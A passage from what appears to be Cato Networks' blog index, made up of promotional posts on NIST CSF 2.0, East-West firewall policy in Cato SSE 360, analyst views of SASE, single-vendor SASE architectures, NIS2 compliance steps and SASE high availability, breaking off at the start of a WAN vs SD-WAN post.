outcomes.  Framework Tiers to Characterize Cybersecurity Risk Management Outcomes  NIST CSF 2.0 includes framework tiers to help define cybersecurity risks and how they will be managed within an organization. These tiers help identify an organization's cybersecurity maturity level and will specify the perspectives of cybersecurity risk and the processes in place to manage those risks. The tiers should serve as a benchmark to inform a more holistic enterprise-wide program to manage and reduce cybersecurity risks.  Using the Framework  There is no one-size-fits-all approach to addressing cybersecurity risks and defining and managing their outcomes. NIST CSF 2.0 is a tool that can be used in various ways to inform and guide organizations in understanding their risk appetite, prioritize activities, and manage expectations for their cybersecurity risk management programs. By integrating and referencing other frameworks, NIST CSF 2.0 is a risk management connector to help develop a more holistic cybersecurity program.  Cato SASE Cloud and NIST CSF  The Cato SASE Cloud supports the Cybersecurity Framework’s core specifications by effectively identifying, mitigating, and reducing enterprise security risk. Cato’s single converged software stack delivers a holistic security posture while providing extensive visibility across the entire SASE cloud.  Our security capabilities map very well into the core requirements of the NIST CSF to provide a roadmap for customers to comply with the framework. For more details, read our white paper on mapping Cato SASE Cloud to NIST CSF v1.1. 

How to Solve the Cloud vs On-Premise Security Dilemma

Introduction Organizations need to protect themselves from the risks of running their business over the internet and processing sensitive data in the cloud. The growth... Read ›
How to Solve the Cloud vs On-Premise Security Dilemma Introduction Organizations need to protect themselves from the risks of running their business over the internet and processing sensitive data in the cloud. The growth of SaaS applications, Shadow IT and work from anywhere have therefore driven a rapid adoption of cloud-delivered cybersecurity services. Gartner defined SSE as a collection of cloud-delivered security functions: SWG, CASB, DLP and ZTNA. SSE solutions help to move branch security to the cloud in a flexible, cost-effective and easy-to-manage way. They protect applications, data and users from North-South (incoming and outgoing) cyber threats. Of course, organizations must also protect against East-West threats, to prevent malicious actors from moving within their networks. Organizations can face challenges moving all their security to the Cloud, particularly when dealing with internal traffic segmentation (East-West traffic protection), legacy data center applications that can’t be moved to the cloud, and regulatory issues (especially in Finance and Government sectors). They often retain a legacy data center firewall for East-West traffic protection, alongside an SSE solution for North-South traffic protection. This hybrid security architecture increases complexity and operational costs. It also creates security gaps, due to the lack of unified visibility across the cloud and on-premise components. A SIEM or XDR solution could help with troubleshooting and reducing security gaps, but it won’t solve the underlying complexity and operational cost issues. Solving the cloud vs on-premise dilemma Cato Networks’ SSE 360 solution solves the “on-premise vs cloud-delivered” security dilemma by providing complete and holistic protection across the organization’s infrastructure.  It is built on a cloud-native architecture, secures traffic to all edges and provides full network visibility and control. Cato SSE 360 delivers both the North-South protection of SSE and the East-West protection normally delivered by a data center firewall, all orchestrated from one unified cloud-based console, the Cato Management Application (CMA). Cato SSE 360 offers a modular way to implement East-West traffic protection. By default, traffic protection is enforced at the POP, including features such as TLS inspection, user/device posture checks and advanced malware protection. See Figure 1 below. This does not impact user experience because there is sub-20ms latency to the closest Cato POP, worldwide. Figure 1 - WAN Firewall Policy Using the centralized Cato Management Application (CMA), it is simple to create a policy based on a zero-trust approach.  For example, in Figure 2 below, we see that only Authorized users (e.g. Cato Fong), Connected to a corporate VLAN, Running a policy-compliant device (Windows with Windows AV active) Are allowed to access sensitive resources (in this case, the Domain Controller inside the organization). Figure 2 - An example WAN Firewall rule In some situations, it is helpful to implement East-West security at the local site: to allow or block communication without sending the traffic to the POP. For Cato services, the default way to connect a site to the network is with a zero-touch edge SD-WAN device, known as a Cato Socket.  With Cato’s LAN Firewall policy, you can configure rules for allowing or blocking LAN traffic directly on the Socket, without sending traffic to the POP. You can also enable tracking (ie. record events) for each rule. Figure 3 - LAN Firewall Policy When to use a LAN firewall policy There are several scenarios in which it could make sense to apply a LAN firewall policy. Let’s review the LAN Firewall logic: Site traffic will be matched against the LAN firewall policies If there is a match, then the traffic is enforced locally at the socket level If there is no match, then traffic will be forwarded by default to the POP the socket is connected to Since the POP implements an implicit “deny” all policy for WAN traffic, administrators will just have to define a “whitelist” of policies to allow users to access local resources. [boxlink link="https://www.catonetworks.com/resources/the-business-case-for-security-transformation-with-cato-sse-360/?cpiper=true"] The Business Case for Security Transformation with Cato SSE 360 | Download the White Paper [/boxlink] Some use cases: prevent users on a Guest WiFi network from accessing local corporate resources. allow users on the corporate VLAN to access printers located in the printer VLAN, over specific TCP ports. allow IOT devices (e.g. CCTV cameras), connected to an IOT-camera VLAN, to access the IOT File Server, but only over HTTPS. allow database synchronization across two VLANs located in separate datacenter rooms over a specific protocol/port. To better show the tight interaction between the LAN firewall engine in the socket and the WAN and Internet firewall engines at the POP, let’s see this use case: In Figure 5, a CCTV camera is connected to an IoT VLAN. A LAN Firewall policy, implemented in the Cato Socket, allows the camera to access an internal CCTV server. However, the Internet Firewall, implemented at the POP, blocks access by the camera to the Internet.  This will protect against command and control (C&C) communication, if the camera is ever compromised by a malicious botnet. Figure 4 - Allow CCTV camera to access CCTV internal server All policies should both be visible in the same dashboard IT Managers can use the same CMA dashboards to set policies and review events, regardless of whether the policy is enforced in the local socket or in the POP. This makes it simple to set policies and track events. We can see this in the figures below, which show a LAN firewall event and a WAN firewall event, tracked on the CMA. Figure 6 shows a LAN firewall event. It is associated with the Guest WiFi LAN firewall policy mentioned above.  Here, we blocked access to the corporate AD server for the guest user at the socket level (LAN firewall). Figure 5 - LAN Firewall tracked event Figure 7 shows a WAN firewall event. It is associated with a WAN firewall policy for the AD Server, for a user called Cato Fong.  In this case, we allowed the user to access the AD Server at the POP level (WAN firewall), using zero trust principles: Cato is an authorized user and Windows Defender AV is active on his device. Figure 6 - WAN Firewall tracked event Benefits of cloud-based East-West protection Applying East-West protection with Cato SSE 360 brings several key benefits: It allows unified cloud-based management across all edges, for both East-West and North-South protection; It provides granular firewall policy options for both local and global segmentation; It allows bandwidth savings for situations that do not require layer 7 inspection; If provides unified, cloud-based visibility of all security and networking events. With Cato SASE Cloud and Cato SSE 360, organizations can migrate their datacenter firewalls confidently to the cloud, to experience all the benefits of a true SASE solution. Cato SSE 360 is built on a cloud-native architecture. It secures traffic to all edges and provides full network visibility and control. It delivers all the functionality of a datacenter firewall, including NGFW, SWG and local segmentation, plus Advanced Threat Protection and Managed Threat Detection and Response.

7 Compelling Reasons Why Analysts Recommend SASE

Gartner introduced SASE as a new market category in 2019, defining it as the convergence of network and security into a seamless, unified, cloud-native solution.... Read ›
7 Compelling Reasons Why Analysts Recommend SASE Gartner introduced SASE as a new market category in 2019, defining it as the convergence of network and security into a seamless, unified, cloud-native solution. This includes SD-WAN, FWaaS, CASB, SWG, ZTNA, and more. A few years have gone by since Gartner’s recognition of SASE. Now that the market has had time to learn and experience SASE, it’s time to understand what leading industry analysts think of SASE? In this blog post, we bring seven observations from analysts who recommend SASE and analyze its underlying impact. You can read their complete insights and predictions in the report this blog post is based on, right here. 1. Convergence Matters More Than Adding New Features According to the Futuriom Cloud Secure Edge and SASE Trend Report, “The bottom line is that SASE underlines a larger trend towards consolidating technology tools and integrating them together with cloud architectures.” Point solutions increase complexity for IT teams. They also expand the attack surface and decrease network performance. SASE converges networking and security capabilities into a holistic and cloud-native platform, solving this problem. Convergence makes SASE more efficient and effective than point solutions. It improves performance through single-pass processing, improves the security posture thanks to holistic intelligence, and simplifies network planning and shortens time to resolve issues with increased visibility. 2. SASE is the Ultimate “Convergence of Convergence” SASE is convergence. Gartner Predicts 2022 highlighted how converged security delivers more complete coverage than multiple integrated point solutions. Converged Security Platforms produce efficiencies greater than the sum of their individual parts. This convergence can be achieved only when core capabilities leverage a single pass engine to address threat prevention, data protection, network acceleration, and more. 3. SASE Supports Gradual Migration: It’s an Evolution, Not a Revolution According to David Holnes, Senior Forrester Analyst, “SASE should be designed to support a gradual migration. There is definitely a way not to buy everything at once but start small and grow gradually based on your need and your pace.” SASE is a impactful market category. However, this doesn’t mean enterprise IT teams should suddenly rearchitect their entire network and security infrastructure without adequate planning. SASE transformation can take a few months, or even a few years, depending on the organization’s requirements. [boxlink link="https://www.catonetworks.com/resources/7-compelling-reasons-why-analysts-recommend-sase/"] 7 Compelling Reasons Why Analysts Recommend SASE | Download the eBook [/boxlink] 4. SASE is about Unification and Simpliciation According to John Burke, CTO and Principal Analyst of Nemertes, “With SASE, policy environments are unified. You’re not trying to define policies in eight different tools and implement consistent security across context.” With SASE, networking and security are inseparable. All users benefit from the holistic security and network optimization in SASE. 5. SASE Allows Businesses to Operate with Speed and Agility According to Andre Kindnes, Principal Analyst at Forrester Research “The network is ultimately tied to business, and becomes the business’ key differentiator.” SASE supports business agility and adds value to the business, while optimizing cost structures. IT can easily perform all support operations through self-service and centralized management. In addition, new capabilities, updates, bug fixes and patches are delivered without extensive impact on IT teams. 6. SASE is Insurance for the Future According to John Burke, CTO and Principal Analyst of Nemertes, “It’s pandemic insurance for the next pandemic.” SASE future proofs the business and network for on-going growth and innovation. It could be a drastic event like a pandemic, significant changes like digital transformation, M&A or merely changes in network patterns. SASE lets organizations move with speed and agility. 7. SASE Changes the Nature of IT Work from Tactical to Strategic According to Mary Barton, Consultant at Forrester, “IT staff is ultimately more satisfied, because they no longer deploy to remote sites to get systems up and running.” She also says, “The effect is IT morale goes up because the problems solved on a day-to-day basis are of a completely different order. They think about complex traffic problems and application troubleshooting and performance.” The health of your network has a direct impact on the health of the business. If there are network outages or performance is poor, the business’ bottom line and employee productivity are both affected. An optimized network frees IT to focus on business-critical tasks, rather than keeping the lights on. Cato Networks is SASE According to Scott Raynovich, Founder and Chief Analyst at Futuriom, “Cato pioneered SASE, creating the category before it existed.” He added, “They saw the need early on for enterprises to deliver global, cloud-delivered networking and security. It’s a vision that is now paying off with tremendous growth.” Read the complete report here.

Single Vendor SASE vs. the Alternatives: Navigating Your Options

SASE sets the design guidelines for the convergence of networking and security as a cloud service. With SASE, enterprises can achieve operational simplicity, reliability, and... Read ›
Single Vendor SASE vs. the Alternatives: Navigating Your Options SASE sets the design guidelines for the convergence of networking and security as a cloud service. With SASE, enterprises can achieve operational simplicity, reliability, and adaptability. Unsurprisingly, since Gartner defined SASE in 2019, vendors have been repositioning their product offerings as SASE. So, what are the differences between the recommended single-vendor SASE approach and other SASE alternatives? Let’s find out. This blog post is based on the e-book “Single Vendor SASE vs. Other SASE Alternatives”, which you can read here. What is SASE? The disappearance of traditional network boundaries in favor of distributed network architectures, with users, applications, and data spread across various environments, has created greater complexity and increased risk. Consequently, enterprises dealt with increased operational costs, expanding security threats, and limited visibility. SASE is a new architectural approach that addresses current and future enterprise needs for high-performing connectivity and secure access for any user to any application, from any location. Per Gartner, the fundamental SASE architectural requirements are: Convergence - Networking and security are converged into one software that simultaneously handles core tasks, such as routing, inspection, and enforcement while sharing context. Identity-driven - Enforcing ZTNA that is based on user identities and granular access control to resources. Cloud-native - Cloud-delivered, multi-tenant, and with the ability to elastically scale. Usually, this means a microservices architecture. Global - Availability around the globe through PoPs (Points of Presence) that are close to users and applications. Support all Edges - Serving all branches, data centers, cloud, and remote users equally through a uniform security policy, while ensuring optimal application performance. In addition, a well-designed SASE solution should be controllable through a single management application. This streamlines the processes of administration, monitoring, and troubleshooting. Common SASE Architectures Today, many vendors are offering “SASE”. However, not all SASE is created equal or offers the same solutions for the same use cases and in the same way. Let's delve deeper into a quick comparison of each SASE architecture and unveil their differences. [boxlink link="https://www.catonetworks.com/resources/cato-sase-vs-the-sase-alternatives/"] Cato SASE vs. The SASE Alternatives | Download the eBook [/boxlink] 1. Single-vendor SASE A single-vendor SASE provider converges network and security capabilities into a single cloud-delivered service. This allows businesses to consolidate different point products, eliminate appliances, and ensure consistent policy enforcement. In addition, event data is stored in a single data lake. This shared context improves visibility and the effective enforcement of security policies. Additionally, centralized management makes it easier to monitor and troubleshoot network & security issues. This makes SASE simple to use, boosts efficiency, and ensures regulatory compliance. 2. Multi-vendor SASE A multi-vendor SASE involves two vendors that provide all SASE functionalities, typically combining a network-focused vendor with a security-focused one. This setup requires integration to ensure the solutions work together, and to enable log collection and correlation for visibility and management.  This approach requires multiple applications. While it can achieve functionality similar to a single-vendor system, the increased complexity often results in reduced visibility, and lack of agility and flexibility. 3. Portfolio-vendor SASE (Managed SASE) A portfolio-vendor SASE is when a service provider delivers SASE by integrating various point solutions, including a central management dashboard that uses APIs for configuration and management. While this model relieves the customer from handling multiple products, it still brings the complexity of managing a diverse SASE infrastructure. In addition, MSPs choosing this approach may face longer lead times for changes and support, adversely impacting an organization’s agility and flexibility. 4. Appliance-based SASE Appliance-based SASE, often pitched by vendors that are still tied to legacy on-premise solutions, typically routes remote users and branch traffic through a central on-site or cloud data center appliance before it reaches its destination. Although this approach may combine network and security features, its physical nature and backhauling of network traffic can adversely affect flexibility, performance, efficiency and productivity. It's a proposition that may sound appealing but has underlying limitations. Which SASE Option Is Best for Your Enterprise? It might be challenging to navigate the different SASE architectures and figuring out the differences between them. In the e-book, we present a concise comparison table that maps out the SASE architectures according to Gartner’s SASE requirements. The bottom line: a single-vendor SASE is most equipped to answer enterprises’ most pressing challenges: Network security Agility and flexibility Efficiency and productivity This is enabled through: Convergence - eliminating the need for complex integrations and troubleshooting. Identity-driven approach - for increased security and compliance. Cloud-native architecture - to ensure support for future growth. Global availability - to enhance productivity and support global activities and expansion. Support for all edges - one platform and one policy engine across the enterprise to enhance security and efficiency. According to Gartner, by 2025, single-vendor SASE offerings are expected to constitute one-third of all new SASE deployments. This is a significant increase from just 10% in 2022. How does your enterprise align with this trend? Are you positioned to be part of this growing movement? If you're interested in diving deeper into the various architectures, complete with diagrams and detailed comparisons, while exploring specific use cases, read the entire e-book. You can find it here.

Achieving NIS2 Compliance: Essential Steps for Companies 

Introduction In an increasingly digital world, cybersecurity has become a critical concern for companies. With the rise of sophisticated cyber threats, protecting critical infrastructure and... Read ›
Achieving NIS2 Compliance: Essential Steps for Companies  Introduction In an increasingly digital world, cybersecurity has become a critical concern for companies. With the rise of sophisticated cyber threats, protecting critical infrastructure and ensuring the  continuity of essential services has become a top priority. The EU’s Network and Information Security Directive (NIS2), which supersedes the previous directive from 2016, establishes a framework to enhance the security and resilience of network and information systems. In this blog post, we will explore the key steps that companies need to take to achieve NIS2 compliance.  Who needs to comply with NIS2?   The first step towards NIS2 compliance is to thoroughly understand the scope of the directive and its applicability to your organization. It is critical to assess whether your organization falls within the scope and to identify the relevant requirements.   For non-compliance with NIS regulations, companies providing essential services such as energy, healthcare, transport, or water may be fined up to £17 million in the UK and €10 million or 2% of worldwide turnover in the EU.  NIS2 will apply to any organisation with more than 50 employees whose annual turnover exceeds €10 million, and any organisation previously included in the original NIS Directive.   The updated directive now also includes the following industries:  Electronic communications  Digital services  Space  Waste management  Food  Critical product manufacturing (i.e. medicine)  Postal services  Public administration  Industries included in the original directive will remain within the remit of the updated NIS2 directive. Some smaller organizations that are critical to the functioning of a member state will also be covered by NIS2.  [boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/?cpiper=true"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP | Download the Whitepaper [/boxlink] Achieving Compliance  NIS2 introduces more stringent security requirements. It requires organizations to implement both organizational and technical measures to safeguard their networks and information systems. This includes measures such as risk management, incident detection and response, regular security assessments, and encryption of sensitive data.   By adopting these measures, organisations can significantly enhance their overall security posture.  Let’s have a closer look at the key steps to achieve NIS2 compliance:  Perform a Risk Assessment  Conduct a detailed risk assessment to identify potential vulnerabilities and threats to your network and information systems. This assessment should cover both internal and external risks, such as malware attacks, unauthorized access, human errors, and natural disasters. Understanding the specific risks your organization faces will help you design effective security measures.  Establish a Security Governance Framework  Develop a robust security governance framework that outlines the roles, responsibilities, and processes necessary to achieve and maintain NIS2 compliance. Assign clear accountability for cybersecurity at all levels of your organization and establish protocols for risk management, incident response, and communication.  Implement Security Measures  Implement appropriate technical and organizational security measures to protect your network and information systems. Ensure that they are regularly reviewed, updated, and tested to address evolving threats. Example measures include access controls using multi-factor authentication, encryption using services like PKI certificates to secure networks and systems, regular vulnerability assessments, intrusion detection and prevention systems, and secure software development practices..  Supply chain security   Assess suppliers, service providers, and even data storage providers for vulnerabilities. NIS2 requires that companies thoroughly understand potential risks, establish close relationships with partners, and consistently update security measures to ensure the utmost protection.  Incident Response and Reporting  Establish a well-defined incident response plan to address and mitigate cybersecurity incidents promptly. This plan should include procedures for identifying, reporting, and responding to security breaches or disruptions. Designate responsible personnel and establish communication channels to ensure swift and effective incident response.   NIS2 compliant organizations must report cybersecurity incidents to the competent national authorities. They must submit an “early warning” report within 24 hours of becoming aware of an incident, followed by an initial assessment within 72 hours, and a final report within one month.   Business Continuity   Implement secure backup and recovery procedures to ensure the availability of key services in the event of a system failure, disaster, data breaches or other cyber-attacks. Backup and recovery measures include regular backups, testing backup procedures, and ensuring the availability of backup copies.   Collaboration and Information Sharing  Establish a culture of proactive information exchange related to cyber threats, incidents, vulnerabilities, and cybersecurity practices. NIS2 recognizes the significance of sharing insights into the tools, methods, tactics, and procedures employed by malicious actors, as well as preparation for a cybersecurity crisis through exercises and training.  Foster collaboration and information sharing with relevant authorities, sector-specific CSIRTs (Computer Security Incident Response Team), and other organisations in the same industry. NIS2 encourages structured information-sharing arrangements to promote trust and cooperation among stakeholders in the cyber landscape. The aim is to enhance the collective resilience of organizations and countries against the evolving cyber threat landscape.  Compliance Documentation and Auditing  Maintain comprehensive documentation of your NIS2 compliance efforts, including policies, procedures, risk assessments, incident reports, and evidence of security measures implemented. Regularly review and update these documents to reflect changes in your organization or the threat landscape. Consider engaging independent auditors to evaluate your compliance status and provide objective assessments.  Training and Awareness  Invest in continuous training and awareness programs to educate employees about the importance of cybersecurity and their role in maintaining NIS2 compliance. Regularly update employees on emerging threats, best practices, and incident response procedures. Foster a culture of security consciousness to minimize human-related risks.  The right network and security platform can help  Cato Networks offers a comprehensive solution and infrastructure that can greatly assist companies in achieving NIS2 compliance. By leveraging Cato's Secure Access Service Edge (SASE) platform, organizations can enhance the security and resilience of their network and information systems.   Cato's integrated approach combines SD-WAN, managed security services and global backbone services into a cloud-based service offering. Its products are designed to help IT staff manage network security for distributed workforces accessing resources across the wide area network (WAN), cloud and Internet. The Cato SASE Cloud platform supports more than 80 points of presence in over 150 countries.   The company's managed detection and response (MDR) platform combines machine learning and artificial intelligence (AI) models to process network traffic data and identify threats to its customers, in a timely manner.  Cato SASE cloud offers a range of security services like Intrusion Prevention Systems (IPS), Anti Malware (AM), Next Generation Firewalls (NGFW) and Secure Web Gateway, to provide robust protection against cyber threats,   It also provides cloud access security broker (CASB) and Data Loss Prevention (DLP) capabilities to protect sensitive assets and ensure compliancy with cloud applications. The Cato SASE cloud is a zero-trust identity driven platform ensuring access-control based on popular multifactor authentication, integration with popular Identity providers like Microsoft, Google, Okta, Onelogin and OneWelcome.  With Cato's centralized management and visibility, companies can efficiently monitor and control their network traffic as well as all the security events triggered. By partnering with Cato Networks, companies can leverage a comprehensive solution that streamlines their journey towards NIS2 compliance while bolstering their overall cybersecurity posture.  Cato Networks is ISO27001, SOC1-2-3 and GDPR compliant organization. For more information, please visit our Security, Compliance and Privacy page. Conclusion  Achieving NIS2 compliance requires a comprehensive approach to cybersecurity, involving risk assessments, robust security measures, incident response planning, collaboration, and ongoing training. By prioritizing network and information security, companies can enhance the resilience of critical services and protect themselves and their customers from cyber threats.   To safeguard your organization's digital infrastructure, be proactive, adapt to evolving risks, and ensure compliance with the NIS2 directive.  

SASE Instant High Availability and Why You Should Care 

High availability may be top of mind for your organization, and if not, it really should be. The cost range of an unplanned outage ranges... Read ›
SASE Instant High Availability and Why You Should Care  High availability may be top of mind for your organization, and if not, it really should be. The cost range of an unplanned outage ranges from $140,000 to $540,000 per hour.  Obviously, this varies greatly between organizations based on a variety of factors specific to your business and environment. You can read more on how to calculate the cost of an outage to your business here: Gartner.  The adoption of the cloud makes high availability more critical than ever, as users and systems now require reliable, secure connectivity to function.  With SASE and SSE solutions, vendors often focus on the availability SLA of the service, but modern access requires a broader application of HA across the entire solution. Starting with the location, simple, low-cost, zero-touch devices should be able to easily form HA pairs. Connectivity should then utilize the best path across multiple ISPs, connecting to the best point of presence (with a suitable backup PoP nearby as well) and finally across a middle-mile architected for HA and performance (a global private backbone if you will).  How SASE Provides HA  If this makes sense to you and you don’t currently have HA in all the locations and capabilities that are critical to your business, it is important to understand why this may be. Historically, HA was high effort and high cost as appliances-based solutions required nearly 2x investment to create HA pairs. Beyond just the appliances, building redundant data centers and connectivity was also out of reach for many organizations. Additionally, customers were typically responsible for architecting, deploying, and maintaining the HA deployment (or hiring a consultant), greatly improving the overall complexity of the environment.   [boxlink link="https://www.catonetworks.com/resources/cato-named-a-challenger-in-the-gartner-magic-quadrant-for-single-vendor-sase/?cpiper=true"] Cato named a Challenger in the Gartner® Magic Quadrant™ for Single-vendor SASE | Download the Report [/boxlink] Let’s say that you do have the time and budget to build your own HA solution globally, is the time and effort worth it to you? How long will it take to implement? I understand you’ve worked hard to become an expert on specific vendor technologies, and it never hurts to know your way around a command line, but implementation and configuration are only the start. Complex HA configurations are difficult to manage on an ongoing basis, requiring specialized knowledge and skills, while not always working as expected when a failure occurs.   To protect your business, HA is essential, and SASE and SSE architectures should provide it on multiple levels natively as part of the solution. We should leave complicated command-line-based configurations and tunnels with ECMP load balancing in the past where they belong, replacing them with the simple, instant high-availability of a SASE solution you know your organization can rely on. Want to see the experience for yourself? Try this interactive demo on creating HA pairs with Cato Sockets here, I warn you, it’s so easy it may just be the world’s most boring demo. 

Traditional WAN vs. SD-WAN: Everything You Need to Know 

The corporate WAN connects an organization’s distributed branch locations, data center, cloud-based infrastructure, and remote workers. The WAN needs to offer high-performance and reliable network... Read ›
Traditional WAN vs. SD-WAN: Everything You Need to Know  The corporate WAN connects an organization’s distributed branch locations, data center, cloud-based infrastructure, and remote workers. The WAN needs to offer high-performance and reliable network connectivity to ensure all users and applications can communicate effectively.  As the WAN expands to include SaaS applications and cloud data centers, managing this environment becomes more challenging. Companies reliant on a traditional WAN architecture will seek out alternative means of connectivity like SD-WAN.   Below, we compare the traditional WAN to SD-WAN, and explore which of the two is better suited for the modern organization.   Traditional WAN Overview  WANs were designed to connect distributed corporate location